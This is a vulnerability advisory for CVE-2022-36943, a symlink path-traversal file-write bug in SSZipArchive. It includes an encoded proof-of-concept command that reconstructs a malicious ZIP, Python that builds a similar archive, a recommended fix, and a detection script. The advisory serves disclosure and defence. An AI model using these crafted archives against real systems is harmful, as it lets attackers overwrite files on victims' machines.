Headline
CVE-2022-36943: SSZipArchive Arbitrary File Write Vulnerability
SSZipArchive versions 2.5.3 and older contain an arbitrary file write vulnerability caused by a lack of sanitization of symlink target paths. SSZipArchive will overwrite files on the filesystem when opening a malicious ZIP whose first entry is a symlink.
Vulnerability Description:
SSZipArchive typically sanitizes file paths to ensure that no files are written outside of the provided destination directory argument. However, symlinks are also supported and have no sanitization checks performed on the symlink’s target path.
An attacker can therefore place a symlink pointing to a location of their choosing as the first entry in the archive, so that the symlink is created before anything else. If a later regular file in the ZIP has the same name as the symlink, the library opens it with an fopen() call that implicitly follows the symlink, and the file's contents are written to the symlink target.
An example file may look like the following, where the first entry is a symlink whose target is …/test:
$ unzip -v ./symlink_escape.zip
Archive: ./symlink_escape.zip
Length Method Size Cmpr Date Time CRC-32 Name
-------- ------ ------- ---- ---------- ----- -------- ----
7 Stored 7 0% 06-30-2022 06:14 85e2e03c test
5 Defl:N 7 -40% 06-30-2022 06:14 3610a686 test
-------- ------- --- -------
12 14 -17% 2 files
Proof of Concept:
The following bash script will un-base64 and uncompress an .xz file containing a maliciously crafted ZIP archive.
echo -n "/Td6WFoAAATm1rRGAgAhARYAAAB0L+Wj4ADLAFxdACgSvGAol9VpzGR79fbdQZYxkTvx1S6doFjMMPFDEMyTmKrcgRgnOk+lDGZg51l0XJsdSne7oHE79HfM7ZzptavRzCqA5+gmfZMSfAeYDS+4bGvA2k6hII8S2qgAAMU3KxoPPYbUAAF4zAEAAADOOX2wscRn+wIAAAAABFla" | base64 -d | xz -d > symlink_escape.zip
The symlink_escape.zip file can then be used in any application that handles a ZIP archive using SSZipArchive, including its samples. A file named test containing hello will be written to the destination directory’s parent after unzipping completes.
Recommendation:
Add path sanitization checks to the symlink's target to ensure it resolves to a location inside the destination path. Symlinks whose targets do not resolve within the destination path should be skipped unless the caller explicitly opts in.
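As an added example of the recommended check (written for this advisory; it is not SSZipArchive's code), the following Python inspects a ZIP's central directory before extraction: it flags symlink entries (Unix mode bits in external_attr) whose target resolves outside the destination, and regular entries that reuse the name of an earlier symlink, which is the pattern in the listing above. The destination path and the two sample archives are constructed assumptions.

```python
import io
import os
import stat
import warnings
import zipfile
DEST = "/tmp/extract-dest"  # assumed destination directory; it need not exist


def inside_dest(dest: str, rel: str) -> bool:
    # True if dest/rel, after '..' normalisation and link resolution, stays under dest.
    root = os.path.realpath(dest)
    full = os.path.realpath(os.path.join(root, rel))
    return full == root or full.startswith(root + os.sep)


def find_unsafe_entries(zip_bytes: bytes, dest: str) -> list:
    # Returns (entry name, reason) for every entry that could write outside dest.
    problems, links_seen = [], set()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if not inside_dest(dest, name):
                problems.append((name, "entry path escapes destination"))
            elif stat.S_ISLNK(info.external_attr >> 16):  # Unix mode is in the high 16 bits
                # A symlink entry's payload is its target path, relative to the link's directory.
                target = zf.read(info).decode("utf-8", "replace")
                rel_target = os.path.join(os.path.dirname(name), target)
                if os.path.isabs(target) or not inside_dest(dest, rel_target):
                    problems.append((name, f"symlink target {target!r} escapes destination"))
                links_seen.add(name)
            elif name in links_seen:
                # A regular file reusing a symlink's name is opened through the link (the bug).
                problems.append((name, "regular file shares the name of an earlier symlink entry"))
    return problems


def build_sample_zip(entries) -> bytes:
    # Constructed test archive; entries are (name, payload, is_symlink) tuples.
    buf = io.BytesIO()
    with warnings.catch_warnings(), zipfile.ZipFile(buf, "w") as zf:
        warnings.simplefilter("ignore")  # zipfile warns about duplicate names; that is the point
        for name, payload, is_link in entries:
            info = zipfile.ZipInfo(name)
            info.external_attr = ((stat.S_IFLNK if is_link else stat.S_IFREG) | 0o644) << 16
            zf.writestr(info, payload)
    return buf.getvalue()


# Mirrors the advisory's listing: symlink 'test' first, then a regular file 'test'.
MALICIOUS = build_sample_zip([("test", "../test", True), ("test", "hello\n", False)])
BENIGN = build_sample_zip([("link", "data.txt", True), ("data.txt", "hello\n", False)])
```

Running find_unsafe_entries(MALICIOUS, DEST) reports both entries, while the benign archive (a symlink whose target stays inside the destination) produces no findings.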